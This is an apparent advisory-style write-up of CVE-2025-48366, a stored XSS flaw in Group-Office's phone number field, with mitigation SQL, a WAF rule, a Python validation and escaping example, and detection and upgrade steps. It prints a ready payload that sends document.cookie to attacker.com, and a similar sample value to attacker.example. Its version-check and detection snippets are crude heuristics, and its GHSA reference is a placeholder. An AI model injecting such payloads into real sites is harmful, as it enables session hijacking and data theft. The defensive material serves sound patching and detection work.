How CVE-2025-48366 Works
This stored XSS vulnerability in Group-Office allows attackers to inject malicious JavaScript into the Phone Number field of user profiles. When another user views the compromised profile in the Address Book, the payload executes automatically, with no interaction beyond opening the profile. The attack leverages improper input sanitization, enabling persistent script execution that can perform actions such as session hijacking, forced redirects, or data exfiltration via unauthorized fetch requests. The vulnerability affects all versions earlier than 6.8.119 and all versions earlier than 25.0.20.
DailyCVE Form
Platform: Group-Office
Version: <6.8.119, <25.0.20
Vulnerability: Stored XSS
Severity: Medium
Date: 05/29/2025
Prediction: Patch expected by 06/15/2025
What Undercode Says:
Analytics:
- Attack complexity: Low (no user interaction required)
- Exploitability: High (publicly accessible fields)
- Prevalence: Limited to Group-Office instances with outdated versions
Exploit Commands:
// Payload for Phone Number field: "><script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
Mitigation Commands:
1. Immediate Workaround:
-- Strips markup characters from every stored phone value that contains one; back up the table first.
UPDATE go_users SET phone = REGEXP_REPLACE(phone, '[<>"\']', '') WHERE phone REGEXP '[<>"\']';
2. WAF Rule to Block XSS:
location /groupoffice { modsecurity on; modsecurity_rules 'SecRule ARGS "@detectXSS" "id:1001,phase:2,deny,status:403"'; }
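The fix the mitigations aim at is shown below as an added example (not Group-Office's own code): the phone field is validated against an allowlist on input, HTML-escaped on output so stored markup cannot break out of the attribute, and the same character check the SQL workaround relies on is run over stored values to find rows that need cleaning. The sample phone values and the `attacker.example` host are constructed.

```python
import html
import re

# Constructed sample of stored phone values; the last one carries attacker-controlled
# markup of the kind the advisory describes (a phone field that was never validated).
STORED_PHONES = [
    "+1 (555) 010-2000",
    "0049-30-1234567",
    '"><script>fetch("https://attacker.example/?c="+document.cookie)</script>',
]

# Allowlist: the only characters a phone number needs. Angle brackets, quotes and
# letters never pass, so a payload is rejected before it can be stored.
PHONE_RE = re.compile(r"^\+?[0-9][0-9 ()./-]{2,30}$")

# Same character set the SQL workaround strips; used to audit already-stored data.
MARKUP_RE = re.compile(r'[<>"\']')


def is_valid_phone(value: str) -> bool:
    """Input validation: accept only values that match the allowlist."""
    return PHONE_RE.fullmatch(value) is not None


def render_phone_unsafe(value: str) -> str:
    """The vulnerable pattern: the stored value is concatenated straight into HTML,
    so a leading '">' closes the attribute and the rest is parsed as markup."""
    return f'<input type="text" name="phone" value="{value}">'


def render_phone_safe(value: str) -> str:
    """Output encoding for an attribute context: quotes and angle brackets become
    entities, so the browser shows the text and never parses it as a tag."""
    return f'<input type="text" name="phone" value="{html.escape(value, quote=True)}">'


def find_tainted(values):
    """Detection over stored data: return the values containing markup characters."""
    return [v for v in values if MARKUP_RE.search(v)]


if __name__ == "__main__":
    for v in STORED_PHONES:
        print(f"valid={is_valid_phone(v)!s:5} safe={render_phone_safe(v)}")
    print("rows needing cleanup:", find_tainted(STORED_PHONES))
```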
Patch Verification:
curl -s https://example.com/groupoffice/ | grep -q "6.8.119" && echo "Patched" || echo "Vulnerable"
Detection Script (Python):
import requests

target = "https://example.com"  # base URL of the instance to check (placeholder)
vuln_endpoint = "/groupoffice/modules/addressbook/view.php"
response = requests.get(target + vuln_endpoint)
# Coarse heuristic: a bare "<script>" match also fires on the page's own legitimate
# scripts, so apply the check to the rendered phone value rather than the whole document.
if "<script>" in response.text:
    print("XSS Detected")
Upgrade Instructions:
wget https://downloads.group-office.com/6.8.119/groupoffice.tar.gz
tar -xzf groupoffice.tar.gz
chown -R www-data:www-data /var/www/groupoffice
References:
- GitHub Advisory: GHSA-xxxx-xxxx-xxxx
- CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2025-48366
Sources:
Reported By: nvd.nist.gov